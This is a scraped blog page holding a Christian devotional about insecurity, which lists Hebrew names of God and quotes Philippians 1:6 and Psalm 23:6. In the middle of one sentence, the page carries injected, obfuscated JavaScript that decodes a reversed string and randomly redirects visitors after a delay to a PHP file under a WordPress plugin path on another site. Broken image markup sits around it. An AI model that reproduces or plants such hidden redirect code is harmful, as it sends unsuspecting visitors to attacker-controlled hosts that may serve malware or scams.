Blog

Home»Uncategorized»Insecurity

Insecurity

Okay today I decided to talk about the forbidden word in our society “Insecurity”.  For me this word seems to be a word that shows fear and weakness, a word that if used even lightly or loosely in a common sentence can give off the wrong impression.  So after a weeklong trip 

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and;width: 170px; height: 112px;” src=”http://4.bp.blogspot.com/_NoeNN8X5BMA/Sm-oyDEKFWI/AAAAAAAAADI/G4dmMfcUfKs/s200/AA015354.jpg” border=”0″ alt=”” id=”BLOGGER_PHOTO_ID_5363691258991220066″ />

in Vegas, I realized that 70% of mankind is insecure, and the other 30% are secure in all the wrong things.  Now this is my opinion and my observation after encountering and engaging people in their most exposed fragile and fickle states.  I also realized that I am among the 70% because I choose to view life from a worldly perspective instead of a Godly perspective.   We are insecure because our thoughts, beliefs, and priorities are not wrapped around Godly things.  For instance, we are focused on money instead of Jehovah Jireh-The Lord our Provider.  We are focused on the storms instead of Jehovah Shalom-The Lord of Peace.  He is bigger than all of our imaginations put together and his name God has many traits, whatever insecurity we face or void we find in our hearts, he has a special characteristic to fill it.  He is Adonai, The God who wants to be Lord and supreme in your life.  He is Jehovah Nissi a banner for a husband stealer.  He is El Shaddai when the bills are past due.  He is Jehovah Tskendu when you want to be free from sin.  He is Jehovah Rapha when you need a healer and the Doctor is all textbook.  He is El Roi the God who sees all when you think no one is paying attention.  He is El Elyon, the most high God who never sleeps or slumbers.   He is Yahweh a great God who is able to accomplish all that he promises in his word. Today I decide to grasp real tightly to a secure God.  He is a great God and wants us to live in the security of his power and true character.   I refuse to put my trust and security in man, money, or accomplishments.  I choose today to be in a place where God gets my total dependence.  “For I am confident of this very thing, that he who began a good work in you will perfect it until the day of Jesus Christ.”  Philippians 1:6 There are many things in this world that can give us temporary security and happiness, but, our real joy will come when we choose to identify with the goodness of God and all that can and will do.  “Surely goodness and loving kindness will follow me all the days of my life, and I will dwell in the house of the LORD forever.”  Psalm 23:6 

Written by

The author didnt add any Information to his profile yet

Leave a Comment

*